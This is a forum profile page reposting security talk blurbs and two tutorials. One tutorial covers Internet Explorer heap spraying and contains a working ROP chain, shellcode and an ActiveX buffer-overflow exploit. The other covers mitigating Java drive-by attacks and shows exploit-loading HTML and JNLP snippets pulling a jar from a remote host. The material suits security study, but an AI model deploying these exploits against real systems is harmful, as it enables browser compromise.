Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18715

  • Joined

  • Last visited

  • Days Won

    701

 Content Type 

Everything posted by Nytro

  1. Nytro
    Sploitego - Maltego's (Local) Partner In Crime Description: PDF : - https://media.defcon.org/dc-20/presentations/Douba/DEFCON-20-Douba-Sploitego.pdf Extra : - https://media.defcon.org/dc-20/presentations/Douba/Extras.zip Have you ever wished for the power of Maltego when performing internal assessments? Ever hoped to map the internal network within seconds? Or that Maltego had a tad more aggression? Sploitego is the answer. In the presentation we'll show how we've carefully crafted several local transforms that gives Maltego the ooomph to operate nicely within internal networks. Can you say Metasploit integration? ARP spoofing? Passive fingerprinting? SNMP hunting? This all is Sploitego. But wait - there's more. Along the way we'll show you how to use our awesome Python framework that makes writing local transforms as easy as 'Hello World'. Sploitego makes it easy to quickly develop, install, distribute, and maintain Maltego Local transforms. The framework comes with a rich set of auxiliary libraries to aid transform developers with integrating attack, reconnaissance, and post exploitation tools. It also provides a slew of web tools for interacting with public repositories. Sploitego and its underlying Python framework will be released at DEF CON as open source - yup - you can extend it to your heart's content. During the presentation we'll show the awesome power of the tool with live demos and scenarios as well as fun and laughter. Nadeem Douba - GWAPT, GPEN: Currently situated in the Ottawa (Ontario, Canada) valley, Nadeem is a senior research analyst at Cygnos Information Security (a Raymond Chabot Grant Thornton company). Nadeem provides technical security consulting services to various clients in the health, education, and public sectors. Nadeem has been involved within the security community for over 10 years and has frequently presented at ISSA and company sponsored seminars and training sessions. He is also an active member of the open source software community and has contributed to projects such as libnet, Backtrack, and Maltego. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Sploitego - Maltego's (Local) Partner In Crime
  2. Nytro
    Hacking The Google Tv Description: PDF : - https://media.defcon.org/dc-20/presentations/Xenofex/DEFCON-20-Xenofex-Panel-Hacking-the-GoogleTV.pdf The GoogleTV platform is designed to bring an integrated web experience, utilizing the Chrome web browser and Android applications, to your television. GoogleTV is based on the Android operating system, which is mainly used in tablets and smart phones, but customized with security features not normally seen on most Android devices. The current version of the platform utilizes signatures to establish a “chain of trust” from bootloader to system applications. This presentation will focus on the current GoogleTV devices, including X86 platform details, and the exhaustive security measures used by each device. The presentation will also include video demonstrations of previously found bugs and exploits for each GoogleTV device and includes specific details about how each bug works. Furthermore, we will include interesting experiences that the team has encountered along the way. Finally the talk will be capped off with the release of multiple unpublished GoogleTV exploits which will allow unsigned kernels across all x86 devices (Revue / Sony GoogleTV). Amir "Zenofex" Etemadieh founded the GTVHacker group and has been working on the GTVHacker project from its initial start in November 2010. Amir has done independent security research in consumer electronics including the Logitech Revue, Ooma Telo, Samsung Galaxy S2, Boxee Box and services such as the 4G Clear Network finding both hardware and software flaws. Twitter: @zenofex GTV Hacker GTVHacker CJ Heres is an IT consultant during the day, tinkerer at night. He enjoys examining and repairing all sorts of devices from cars to blu-ray players. His philosophy is to use a simple approach for complex problems. CJ’s recent work includes Sony GoogleTV, Boxee Box, and Vizio Smart TV’s. Twitter: @cj_000_ Dan Rosenberg Dan Rosenberg is a vulnerability researcher who takes sick pleasure in exploiting anything with a CPU. He once punched an Android in the face. Twitter: @djrbliss Tom "tdweng" Dwenger is a software engineer who has been developing and reversing Android for the last 2 years. Tom is known for being able to quickly reverse Android applications and has been an active member of the GTVHacker team since its initial start in 2010. Twitter: @tdweng Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Hacking The Google Tv
  3. Nytro
    Demorpheus: Getting Rid Of Polymorphic Shellcodes In Your Network Description: One of the most effective techniques used in CTF is the usage of various exploits, written with the help of well-known tools or even manually during the game. Experience in CTF participation shows that the mechanism for detecting such exploits is able to significantly increase the defense level of the team. In this presentation we propose an approach and hybrid shellcode detection method, aimed at early detection and filtering of unknown 0-day exploits at the network level. The proposed approach allows us to summarize capabilities of shellcode detection algorithms developed over recent ten years into optimal classifiers. The proposed approach allows us to reduce the total fp rate almost to 0, provides full coverage of shellcode classes detected by individual classifiers and significantly increases total throughput of detectors. Evaluation with shellcode datasets, including Metasploit Framework 4.3 plain-text, encrypted and obfuscated shellcodes, benign Win32 and Linux ELF executables, random data and multimedia shows that hybrid data-flow classifier significantly boosts analysis throughput for benign data - up to 45 times faster than linear combination of classifiers, and almost 1.5 times faster for shellcode only datasets. Svetlana Gaivoronski is a PhD student at Computer Systems Lab, Computer Science Dept. of Moscow State University, Russia. Svetlana is a member of the Bushwhackers CTF team which shows the following results in recent years: 2nd place in Deutsche Post Security Cup 2010, 6th place in the final of ruCTF 2012 (8th at qualification), 12th place at ruCTF Europe 2011, 4th place in the final of ruCTF 2011 (and 1st at qualification), etc. Svetlana works at Redsecure project (experimental IDS/IPS) at Moscow State University. Her primary interests are network worms propagation detection and filtering, shellcode detection, static and runtime analysis of malware. Twitter:@SadieSV lvk.cs.msu.su/~sadie Dennis Gamayunov holds a PhD and works as Senior Researcher at Computer Systems Lab, Computer Science Dept. of Moscow State University, Russia. Dennis is the leader of the small network security research group in MSU, project lead of the experimental event-driven and natively multicore Redsecure IDS/IPS, founder of Bushwhackers CTF team, with primary research and practical interests in network level malcode detection, high-speed traffic processing (including FPGA-based), and OS security with fine-grained privilege separation, SELinux and beyond. Twitter: @jamadharma http://redsecure.ru/team/denis-gamayunov PDF : - https://media.defcon.org/dc-20/presentations/Svetlana-Gaivoronski/DEFCON-20-Svetlana-Gaivoronski-Demorpheus.pdf Extra : - https://media.defcon.org/dc-20/presentations/Svetlana-Gaivoronski/Extras.zip Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Demorpheus: Getting Rid Of Polymorphic Shellcodes In Your Network
  4. Nytro
    New Techniques In Sqli Obfuscation: Sql Never Before Used In Sqli Description: SQLi remains a popular sport in the security arms-race. However, after analysis of hundreds of thousands of real world SQLi attacks, output from SQLi scanners, published reports, analysis of WAF source code, and database vendor documentation, both SQLi attackers and defenders have missed a few opportunities. This talk will iterate through the dark corners of SQL for use in new obfuscated attacks, and show why they are problematic for regular-expression based WAFs. This will point the way for new directions in SQLi research for both offense and defense. Nick Galbreath is a director of engineering at Etsy, overseeing groups handling fraud, security, authentication and internal tools. Over the last 18 years, Nick has held leadership positions in number of social and e-commerce companies, including Right Media, UPromise, Friendster, and Open Market, and has consulted for many more. He is the author of "Cryptography for Internet and Database Applications" (Wiley), and was awarded a number of patents in the area of social networking. He holds a master's degree in mathematics from Boston University. Twitter: @ngalbreath client9 https://github.com/client9 PDF : - https://media.defcon.org/dc-20/presentations/Galbreath/DEFCON-20-Galbreath-SQLi-Obfuscation.pdf Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: New Techniques In Sqli Obfuscation: Sql Never Before Used In Sqli
  5. Nytro
    Beef Framework Petty Theft Description: In this video i will show you how to perform social engineering after hooking the browser. Lets see if you made a website that website need a logging credential so in between you can use your Technic and use some social engineering to steal Facebook or any other password using your custom logos. This video is all about phishing using BeEF Browser Exploitation Framework. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Beef Framework Petty Theft
  6. Nytro
    Heap spraying in Internet Explorer with rop nops Lately I have been learning to write some exploits for some of my old discovered vulnerabilities to get it working on Windows 7 with IE9. Previously when exploiting vulnerabilities my POCs had always been on Windows XP IE6 just to make sure it worked and not having to worry about all the mitigations in later versions. In this post I am just sharing some basic info which will hopefully to help others when writing/understanding exploits for the first time while at the same time keeping it simple and not worrying to much about performance or precision. In my old exploits I used the heap spraying code below when testing on IE6. (Just removed the un from unescape as Symantec’s Endpoint Protection doesnt like it in this section, maybe they are just too close to each other as the following unescapes are fine) <SCRIPT language="JavaScript"> var calc, chunk_size, headersize, nopsled, nopsled_len; var heap_chunks, i; calc = escape("%ucccc?"); chunk_size = 0x40000; headersize = 0x24; nopsled = escape("??"); nopsled_len = chunk_size - (headersize + calc.length); while (nopsled.length < nopsled_len) nopsled += nopsled; nopsled = nopsled.substring(0, nopsled_len); heap_chunks = new Array(); for (i = 0 ; i < 1000 ; i++) heap_chunks[i] = nopsled + calc; </SCRIPT> From IE8 things had changed not only because it supported DEP but heap spraying for the above code did not spray the heap. After going through some exploits a realised the only change from the above code I really had to make was by spraying the heap using “substring” function. So the code would now look like this code = nopsled + calc; heap_chunks = new Array(); for (i = 0 ; i < 1000 ; i++) heap_chunks[i] = code.substring(0, code.length); Trying this heap spray code now on Windows 7 with IE9 again failed to spray. After reading Peter Van Eeckhoutte’s heap spraying tutorial on how heap spraying was achieved in IE9 got me thinking to see if I could simplify the code and after a few tests it literately came down to just changing one byte in each chunk. So my final spray code ended up is adding a count to each chunk just to make it unique for (i = 0 ; i < 1000 ; i++) { codewithnum = i + code; heap_chunks[i] = codewithnum.substring(0, codewithnum.length); } This code would now spray on all IE browsers and execute our payload on machines that did not support DEP. With machines supporting DEP a ROP chain is required to make our code executable. For this I decided to use ROP chains generated by mona on library msvcr71.dll which gets shipped with Java 6 and is a non-ASLRed. Due to jumping to our first gadget needed to be precise I wanted to write a javascript code where our sprayed chunks will be full of rop nops saving me the trouble of calculating the precise offset as offsets might vary from different OS’es plus landing in another chunk might have another offset. Alignment is still an issue at times but just incrementing or decrementing our used return address normally solves the issue. So each chunk would only have one rop + calc shellcode at the end of the chunk instead of multiple shellcode blocks in a chunk. All I did was change the nopshed value to nopsled = unescape("%q6224?"); // 0x7c376224 RETN [MSVCR71.dll] Putting it all together we now get a working script for Internet Explorer 6/7/8 and 9. (I had to replace the u with a q otherwise the formatting on the browser gets messed up). <SCRIPT language="JavaScript"> function padnum(n, numdigits) { n = n.toString(); var pnum = ''; if (numdigits > n.length) { for (z = 0; z < (numdigits - n.length); z++) pnum += '0'; } return pnum + n.toString(); } var rop, calc, chunk_size, headersize, nopsled, nopsled_len, code; var heap_chunks, i, codewithnum; // // !mona rop -m msvcr71.dll // * changed from default mona rop chain output // rop = unescape( "%q2e4d%q7c36" + // 0x7c362e4d, # POP EBP # RETN "%q2e4d%q7c36" + // 0x7c362e4d, # skip 4 bytes "%qf053%q7c34" + // 0x7c34f053, # POP EBX # RETN "%q00c8%q0000" + // 0x000000c8, # 0x000000c8-> ebx (size 200 bytes) * "%q4364%q7c34" + // 0x7c344364, # POP EDX # RETN "%q0040%q0000" + // 0x00000040, # 0x00000040-> edx "%qf62d%q7c34" + // 0x7c34f62d, # POP ECX # RETN "%qe945%q7c38" + // 0x7c38e945, # &Writable location "%q496e%q7c36" + // 0x7c36496e, # POP EDI # RETN "%q6c0b%q7c34" + // 0x7c346c0b, # RETN (ROP NOP) "%q2adb%q7c37" + // 0x7c372adb, # POP ESI # RETN "%q15a2%q7c34" + // 0x7c3415a2, # JMP [EAX] "%q4edc%q7c34" + // 0x7c344edc, # POP EAX # RETN "%qa151%q7c37" + // 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF * "%q8c81%q7c37" + // 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN "%q5c30%q7c34"); // 0x7c345c30, # ptr to 'push esp # ret ' // // ruby msfpayload windows/exec cmd=calc.exe J // windows/exec - 200 bytes // http://www.metasploit.com // VERBOSE=false, EXITFUNC=process, CMD=calc.exe // calc = unescape( "%qe8fc%q0089%q0000%q8960%q31e5%q64d2%q528b%q8b30" + "%q0c52%q528b%q8b14%q2872%qb70f%q264a%qff31%qc031" + "%q3cac%q7c61%q2c02%qc120%q0dcf%qc701%qf0e2%q5752" + "%q528b%q8b10%q3c42%qd001%q408b%q8578%q74c0%q014a" + "%q50d0%q488b%q8b18%q2058%qd301%q3ce3%q8b49%q8b34" + "%qd601%qff31%qc031%qc1ac%q0dcf%qc701%qe038%qf475" + "%q7d03%q3bf8%q247d%qe275%q8b58%q2458%qd301%q8b66" + "%q4b0c%q588b%q011c%q8bd3%q8b04%qd001%q4489%q2424" + "%q5b5b%q5961%q515a%qe0ff%q5f58%q8b5a%qeb12%q5d86" + "%q016a%q858d%q00b9%q0000%q6850%q8b31%q876f%qd5ff" + "%qf0bb%qa2b5%q6856%q95a6%q9dbd%qd5ff%q063c%q0a7c" + "%qfb80%q75e0%qbb05%q1347%q6f72%q006a%qff53%q63d5" + "%q6c61%q2e63%q7865%q0065"); // chunk_size = 0x40000; headersize = 0x24; nopsled = unescape("%q6224%q7c37"); // 0x7c376224 RETN [MSVCR71.dll] nopsled_len = chunk_size - (headersize + rop.length + calc.length); while (nopsled.length < nopsled_len) nopsled += nopsled; nopsled = nopsled.substring(0, nopsled_len); code = nopsled + rop + calc; heap_chunks = new Array(); for (i = 0 ; i < 1000 ; i++) { codewithnum = padnum(i,4) + code; heap_chunks[i] = codewithnum.substring(0, codewithnum.length); } </SCRIPT> Here are two images from the top and bottom of one of the chunks. One thing to note is that the calc shellcode size in the above example is 200 bytes and this size needs to be set in our rop chain. Due to the fact that the shellcode is at the bottom of the chunk if the size used by VirtualProtect is greater than our shellcode it reads past the chunk leading to an invalid address and triggering an exception. Here is an example of an exploit I wrote for testing purposes. I discovered this one quite some time ago. The ActiveX library awApi4.dll from “Vantage Linguistics AnswerWorks” contains a number of vulnerable stack-based buffer overflow methods. The Secunia advisory link is here. The ActiveX control had been killbitted at the time with a Microsoft patch MS07-069/942615. <OBJECT classid="clsid:C1908682-7B2C-4AB0-B98E-183649A0BF84" id="poc"> </OBJECT> <SCRIPT language="JavaScript"> var buffer = ""; for (i = 0; i < 215; i++) buffer += unescape("%41") buffer += unescape("%23%62%37%7c") // 0x7c376223 POP EAX # RETN buffer += unescape("%42%42%42%42") // compensate buffer += unescape("%42%42%42%42") // compensate buffer += unescape("%08%08%08%08") // fill return address buffer += unescape("%a9%13%34%7c") // XCHG EAX,ESP # MOV EAX,DWORD // PTR DS:[EAX] #PUSH EAX #RETN buffer += unescape("%24%62%37%7c") // 0x7c376224 RETN for (i = 0; i < 20; i++) buffer += unescape("%43") poc.GetHistory(buffer); </SCRIPT> This exploit has been tested and works 100% on Windows XP SP3 IE 6/7/8 and Windows 7 SP1 IE 8/9. I have included the vulnerable library, registry files to remove/add killbits and the exploit in a zip file that can be downloaded from here. The zip file has a md5 hash of d219582269ee0845f8747d0b64910f71 and the password for the zip file is “answerworks” without quotes. If you find when testing the exploit Windows Calculator fails to load then check if msvcr71.dll library is loaded in IE’s process space as I had noticed on one of my test machines that it does not load up. This heap spraying code should work well for exploiting buffer overflows but exploiting virtual function calls is something I’ll need to look into and on my to-learn-list. On Windows 7 the only real dependency lies in having Java 6 installed as the library msvcr71.dll which comes with Java 6 is not ASLRed or gets rebased. If Java 7 is installed then another rop chain would need to be used as Java 7 libraries are all ASLRed. Windows XP is not subject to ALSR so another rop chain could be used if Java 6 is not installed. References: Security Advisory SA26566 - Vantage Linguistics AnswerWorks 4 API ActiveX Control Buffer Overflow - Secunia Security Vulnerability Patch for iSEEK AnswerWorks Desktop Help Search Microsoft Security Bulletin MS07-069 - Critical : Cumulative Security Update for Internet Explorer (942615) https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/ Sursa: Heap spraying in Internet Explorer with rop nops | GreyHatHacker.NET
  7. Nytro
    Exploiting and mitigating Java exploits in Internet Explorer This year we’ve seen a number of 0 day Java exploits surfacing and various mitigating steps mentioned in various sites that could be taken to prevent us from being compromised. A lot of these mitigating steps vary from each other so when it comes to mitigate Java in Internet Explorer it adds doubt to which is the best mitigation steps to follow. Uninstalling Java would obviously solve the problem but that is not really an option in organisations dependant on Java. This post describes the mitigating steps available, the tests carried out and how to bypass certain mitigations. The tests have been carried out on a fully patched Windows 7 Enterprise 32bit virtual machine with Internet Explorer 8 and a vulnerable version of Java. Prevent loading of applet in IE’s “Internet Zone” This setting disables the loading of Java applets from the Internet zone. There are different keys representing different security zones [3] and the Internet zone has a value of 3. ; First set the URLAction to control APPLET behavior ; Zone 3 is the Internet zone ; 1C00 is the Java invocation policy ; "1C00"=dword:00000000 <-- disable loading of Java applet ; "1C00"=dword:00010000 <-- enable loading of Java applet ; [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] "1C00"=dword:00000000 HKEY_CURRENT_USER (HKCU) entry would take priority first. So if disabled in HKEY_LOCAL_MACHINE (HKLM) but enabled in HKCU then you will still be exploited so it is best just to apply the change in HKCU. Any external site attempting to use an applet tag will now not load the applet and a notification bar will be displayed. This mitigation would only protect from applet tag examples below. With other techniques this mitigation is ineffective. <APPLET archive="calc.jar" code="Exploit.class" width="1" height="1"></APPLET> <APPLET code="Exploit.class" width="1" height="1"></APPLET> Prevent loading of applet in all IE zones This settings stops the loading of Java in all IE browser zones. This might be a problem internally in organisations which depend on the applet tag. ; "UseJava2IExplorer"=dword:00000000 <-- disable loading of Java applet ; "UseJava2IExplorer"=dword:00000001 <-- enable loading of Java applet ; [HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Plug-in\10.7.2] "UseJava2IExplorer"=dword:00000000 An issue with this mitigation is that each time Java is installed the mitigation gets reset to its default value as a new Java version registry key is added. 10.4.0 – Java 7 update 4 10.6.2 – Java 7 update 6 10.7.2 – Java 7 update 7 10.9.2 – Java 7 update 9 Once mitigation has been made a popup would be seen first time. If the check box is ticked “Do not show this message again” it writes to the registry entry below [HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Declined Install On Demand IEv5] "{08B0e5c0-4FCB-11CF-AAA5-00401C608501}"="" This mitigation only stops exploits using the applet tag, cannot be managed by Internet Explorer zones and any new Java update means you’ll need to update the registry again. Invoking Java classids via OBJECT tag Internet Explorer can use the classid attribute OBJECT tag to load Java. Hundreds of Java classids gets registered when Java is installed. One classid is particularly dangerous as it works transparently from the Internet zone without any notification bars or alerts and has been used in actual exploits. The reason being is that this classid gets added in the preapproved list. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{8AD9C840-044E-11D1-B3E9-00805F499D93} This classid calls the latest installed version of Java Plug-in installed on the machine. Whats interesting is that this classid is already added in Windows 7 preapproved registy key without even Java being installed. To mitigate this classid needs to be killbitted [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{8AD9C840-044E-11D1-B3E9-00805F499D93}] "Compatibility Flags"=dword:00000400 To exploit it can be called like this <OBJECT classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="1" height="1"> <PARAM name="code" value="Exploit.class"> </OBJECT> Another way to mitigate this classid is to disable the Java Plugin’s ActiveX control through IE’s “Manage Add-ons”. Once disabled it writes to the registry below and settings are retained even after a Java update though I prefer the killbit option. [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{8AD9C840-044E-11D1-B3E9-00805F499D93}] "Flags"=dword:00000001 "Version"="*" The hundreds of other classids are mainly for backwards compatibility. So if an older specific version of Java is installed, those can be called using a specific classid, in the example below its calling Java 7 update 7 <OBJECT classid="clsid:CAFEEFAC-0017-0000-0007-ABCDEFFEDCBA" width="1" height="1"> <PARAM name="code" value="Exploit.class"> </OBJECT> Or to invoke the latest Java 7 version installed <OBJECT classid="clsid:CAFEEFAC-0017-0000-FFFF-ABCDEFFEDCBA" width="1" height="1"> <PARAM name="code" value="Exploit.class"> </OBJECT> The way the classid versions is worked out is in say CAFEEFAC-xxxx-yyyy-zzzz-ABCDEFFEDCBA, “xxxx”, “yyyy”, and “zzzz” are four-digit numbers to identify the specific version of Java Plug-in to be used. In references [1][2] only a handful of classid’s listed below but actually when Java gets installed it installs hundreds of classids. Click here to see all the CAFEEFAC- classid’s registered on a Java 7 update 4 installation. In these references just killbitting these classids does not make sense as invoking any other classid will give the same two prompts as these ones. (screenshots given further down in the Java Web Start ActiveX control section). So if you are thinking of killbitting these classids then follow Cert’s recommendation [4] as it kills all classids upto a certain version. A Java update will register newer classids each time so if killbitting these is an option you prefer then you’ll need to keep uptodate. These classid’s are the only ones mentioned for Java version 7 and upto update 6. CAFEEFAC-0017-0000-FFFF-ABCDEFFEDCBA CAFEEFAC-0017-0001-FFFF-ABCDEFFEDCBA CAFEEFAC-0017-0002-FFFF-ABCDEFFEDCBA CAFEEFAC-0017-0003-FFFF-ABCDEFFEDCBA CAFEEFAC-0017-0004-FFFF-ABCDEFFEDCBA CAFEEFAC-0017-0005-FFFF-ABCDEFFEDCBA CAFEEFAC-0017-0006-FFFF-ABCDEFFEDCBA CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA So CAFEEFAC-0017-0006-FFFF-ABCDEFFEDCBA might have been killbitted but if you know the Java version you are attacking you could use CAFEEFAC-0017-0000-0006-ABCDEFFEDCBA CAFEEFAC-0017-0000-0006-ABCDEFFEDCBB CAFEEFAC-0017-0000-0006-ABCDEFFEDCBC Another classid registered invokes an old version of Java and to exploit using this classid you’ll have to deal with a third warning window prompt and thiswould come up everytime. To exploit <HTML> <OBJECT CLASSID="clsid:E19F9331-3110-11D4-991C-005004D3B3DB" width="1" height="1"> <PARAM name="code" value="Exploit.class"> </OBJECT> </HTML> And to mitigate killbit the control [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{E19F9331-3110-11D4-991C-005004D3B3DB}] "Compatibility Flags"=dword:00000400 Loading Java via the EMBED tag Java can also be exploited in Internet Explorer using the EMBED tag. Here applet mitigations is ineffective but killbitting/disabling the ActiveX control 8AD9C840-044E-11D1-B3E9-00805F499D93 as mentioned in previous section mitigates it. To exploit <HTML> <EMBED code="Exploit.class" type="application/x-java-applet" width="1" height="1"></EMBED> </HTML> Here the the mimetype “application/x-java-applet” points back to classid 8AD9C840-044E-11D1-B3E9-00805F499D93 Prevent automatically opening JNLP files via APPLET Java Network Launch Protocol (JNLP) could also be used for launching applets directly from JNLP files. To launch an applet from a JNLP file the “jnlp_href” parameter would need to be used in the applet tag. This could be used in a transparent driveby attack too. <HTML> <APPLET><param name="jnlp_href" value="mycalc.jnlp"></APPLET> </HTML> The jnlp file doesnt need to contain the full url path <?xml version="1.0" encoding="UTF-8"?> <jnlp href="mycalc.jnlp"> <information> <title>Calculator</title> <vendor>POC</vendor> </information> <resources> <j2se version="1.7+" /> <jar href="calc.jar" main="true" /> </resources> <applet-desc name="Calculator" main-class="Exploit" width="1" height="1"> </applet-desc> </jnlp> When calling the jnlp file via the html file the jnlp file can be any extension so say in the above code mycalc.jnlp could be called mycalc.txt. Since this uses the applet tag the above mitigation on the applet would mitigate this threat. Double-clicking on a JNLP file Even with all the browser mitigations in place it doesnt stop an attacker to email a jnlp file to the victim. Just by double-clicking the attachment would compromise the machine. <?xml version="1.0" encoding="UTF-8"?> <jnlp href="mycalc.jnlp"> <information> <title>Calculator</title> <vendor>POC</vendor> </information> <resources> <j2se version="1.7+" /> <jar href="http://192.168.1.3/calc.jar" main="true"/> </resources> <applet-desc name="Calculator" main-class="Exploit" width="1" height="1"> </applet-desc> </jnlp> One way to mitigate is to change the file association and/or block jnlp file attachments on your mail relays. HKLM\SOFTWARE\Classes\JNLPFile\Shell\Open\Command\: “”C:\Program Files\Java\jre7\bin\javaws.exe” “%1?” Prevent automatically opening JNLP files via mimetype association Using Java Web Start can be used to open a JNLP file. By default JNLP files open without any interaction from the user. For this to be exploited the web server would have to be configured with the .jnlp file extension to the mimetype “application/x-java-jnlp-file”. Then simply visiting a link say http://192.168.1.3/mycalc.jnlp would compromise your box. <?xml version="1.0" encoding="utf-8"?> <jnlp href="mycalc.jnlp" codebase="http://192.168.1.3/"> <information> <title>Calculator</title> <vendor>POC</vendor> </information> <resources> <j2se version="1.7+"/> <jar href="calc.jar" main="true"/> </resources> <applet-desc name="Calculator" main-class="Exploit" width="1" height="1"> </applet-desc> </jnlp> Signing your own app and using jnlp code below could be used but user interaction is required and you don’t need a vulnerability for this one. <?xml version="1.0" encoding="utf-8"?> <jnlp href="mycalc.jnlp" codebase="http://192.168.1.3/"> <information> <title>Calculator</title> <vendor>POC</vendor> </information> <security> <all-permissions/> </security> <resources> <jar href="mycalc_signed.jar" main="true"/> </resources> <application-desc name="Calculator" main-class="mycalc" width="1" height="1"> </application-desc> </jnlp> To mitigate we can change the default setting of EditFlags to all zeros which will then prompt the user. [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JNLPFile] "EditFlags"=dword:00000000 On the Cert advisory EditFlags is a binary value but a dword value can also be used. Prevent automatically opening JNLP files via ActiveX Control Using Java Web Start ActiveX control can also be used to run a JNLP file but user interaction is required. To exploit <HTML> <OBJECT CLASSID="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" width="1" height="1"> <PARAM name="app" value="http://192.168.1.3/mycalc.jnlp"> </OBJECT> </HTML> and the JNLP file is <?xml version="1.0" encoding="UTF-8"?> <jnlp href="mycalc.jnlp"> <information> <title>Calculator</title> <vendor>POC</vendor> </information> <resources> <j2se version="1.7+" /> <jar href="calc.jar" main="true" /> </resources> <applet-desc name="Calculator" main-class="Exploit" width="1" height="1"> </applet-desc> </jnlp> To mitigate killbit this classid [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{5852F5ED-8BF4-11D4-A245-0080C6F74284}] "Compatibility Flags"=dword:00000400 Java Deployment Toolkit ActiveX Controls This Java Deployment Toolkit classid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA was exploited in 2010 (CVE-2010-1423). On a fully patched Windows 7 machine this has already been killbitted without even Java being installed and points to an alternate classid CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA. This classid has been killbitted in Cert’s mitigation so its recommended to keep this one killbitted too. [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}] "Compatibility Flags"=dword:00000400 Preventing compromise So what it comes down to is just these few changes on your system prevent it from being compromised automatically by a drive by attack. [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JNLPFile] "EditFlags"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] "1C00"=dword:00000000 [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{8AD9C840-044E-11D1-B3E9-00805F499D93}] "Compatibility Flags"=dword:00000400 [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}] "Compatibility Flags"=dword:00000400 Renaming the “jp2iexp.dll” file would also temporarily mitigate the APPLET and OBJECT tag attack vectors but not the others mentioned. A Java update installation would drop the file back though so bear that in mind. Other classids that would need some interaction are also best to be killbitted [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{5852F5ED-8BF4-11D4-A245-0080C6F74284}] "Compatibility Flags"=dword:00000400 [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{E19F9331-3110-11D4-991C-005004D3B3DB}] "Compatibility Flags"=dword:00000400 Using the latest classids for the Java version would require the user to acknowledge two warnings but once accepted thereafter no warning would be given so killbitting the CAFAEFAC- classids might be worth thinking about in your managed environment. Finally JNLP files could be sent via email so you might want to take a proactive step in blocking jnlp file attachments on your mail relays. Latest Java release Following the release of Java 7 update 10 last week I thought I’d do a quick check on its new security features. There is now an updated security tab giving the user now more control on what to do. Changing the security levels makes changes to the file deployment.properties in location C:\Users\user1\AppData\LocalLow\Sun\Java\Deployment By default its set to medium but if changed to low the entry deployment.security.level=LOW is added to the file. Since this is in a low integrity folder this could be changed to LOW settings by a low privileged user. #deployment.properties #Wed Dec 19 17:48:16 GMT 2012 deployment.modified.timestamp=1355939296772 deployment.version=7.0 deployment.security.level=LOW deployment.webjava.enabled=false #Java Deployment jre's #Wed Dec 19 17:48:16 GMT 2012 deployment.javaws.jre.0.registered=true deployment.javaws.jre.0.platform=1.7 deployment.javaws.jre.0.osname=Windows deployment.javaws.jre.0.path=C\:\\Program Files\\Java\\jre7\\bin\\javaw.exe deployment.javaws.jre.0.product=1.7.0_10 deployment.javaws.jre.0.osarch=x86 deployment.javaws.jre.0.location=http\://java.sun.com/products/autodl/j2se deployment.javaws.jre.0.enabled=true deployment.javaws.jre.0.args= Un-checking the “Enable Java content in the browser” is quite drastic step as it deletes all classids, mimetypes, jnlp file association, etc. The command that gets run when un-checking and applying is "C:\PROGRA~1\Java\jre7\bin\ssvagent.exe" -disablewebjava This feature would most definitely protect from browser based attacks but also most likely break all your internal apps so not something to implement without thorough testing in an enterprise environment. For home users it gives the flexibility to enable and disable when needed say if you want to do a vulnerability scan which uses Java. Conclusion This research has shown that if you dont need Java best to just to uninstall it. If there is a requirement then upgrade to Java 7u10 and uncheck the Java content in the browser settings. Finally follow only Certs advisory [4] or the very least make the few mitigating changes mentioned in the “Preventing compromise” section regardless if you have “Java Content in the browser” enabled or disabled. References: [1] How to disable Java – Internet Explorer | Naked Security [2] How to disable the Java web plug-in in Internet Explorer [3] Internet Explorer security zones registry entries for advanced users [4] US-CERT Vulnerability Note VU#636312 - Oracle Java JRE 1.7 Expression.execute() and SunToolkit.getField() fail to restrict access to privileged code [5] How to Unplug Java from the Browser — Krebs on Security [6] Controlling Java in Internet Explorer - IEInternals - Site Home - MSDN Blogs [7] Using APPLET, OBJECT and EMBED Tags [9] Java[tm] Web Start Developer's Guide [10] JNLP File Syntax [11] JNLP Support in the Next Generation Java™ Plug-In Technology (introduced in Java SE 6 update 10) [12] Setting the 